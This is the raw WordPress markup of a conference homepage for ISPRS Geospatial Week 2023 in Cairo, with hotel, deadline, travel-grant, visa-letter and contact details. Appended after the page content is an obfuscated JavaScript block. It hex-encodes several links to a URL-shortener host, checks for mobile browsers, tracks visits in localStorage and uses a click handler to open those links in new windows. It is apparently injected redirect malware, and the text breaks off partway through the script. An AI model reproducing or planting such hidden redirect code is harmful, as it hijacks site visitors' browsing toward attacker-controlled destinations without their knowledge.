href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" image_scale_animation_on_hover=\"n\" image_hover_bg_color=\"n\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 